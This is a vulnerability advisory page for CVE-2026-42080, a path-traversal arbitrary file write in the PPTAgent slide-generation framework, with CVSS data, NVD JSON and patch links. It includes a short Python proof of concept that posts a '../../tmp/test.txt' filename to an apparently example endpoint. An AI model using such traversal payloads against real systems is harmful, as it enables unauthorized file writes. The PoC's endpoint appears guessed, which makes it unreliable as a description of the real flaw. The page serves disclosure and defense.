Security Vulnerability Report
中文
CVE-2026-42080 CVSS 4.6 MEDIUM

CVE-2026-42080

Published: 2026-05-04 17:16:25
Last Modified: 2026-05-05 20:19:04

Description

PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, there is an arbitrary file write vulnerability via `save_generated_slides`. This issue has been patched via commit 418491a.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PPTAgent < commit 418491a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (example) target_url = "http://localhost:8000/api/save_slides" # Malicious payload using path traversal # The goal is to write a file "test.txt" to the parent directory payload = { "filename": "../../tmp/test.txt", # Path traversal payload "content": "This is a malicious content written by POC." } try: # Send POST request to trigger the vulnerability response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Exploit successful! File written.") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42080", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:25.037", "lastModified": "2026-05-05T20:19:04.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, there is an arbitrary file write vulnerability via `save_generated_slides`. This issue has been patched via commit 418491a."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/icip-cas/PPTAgent/commit/418491a9a1c02d9d93194b5973bb58df35cf9d00", "source": "[email protected]"}, {"url": "https://github.com/icip-cas/PPTAgent/security/advisories/GHSA-pxhg-7xr2-w7xg", "source": "[email protected]"}]}}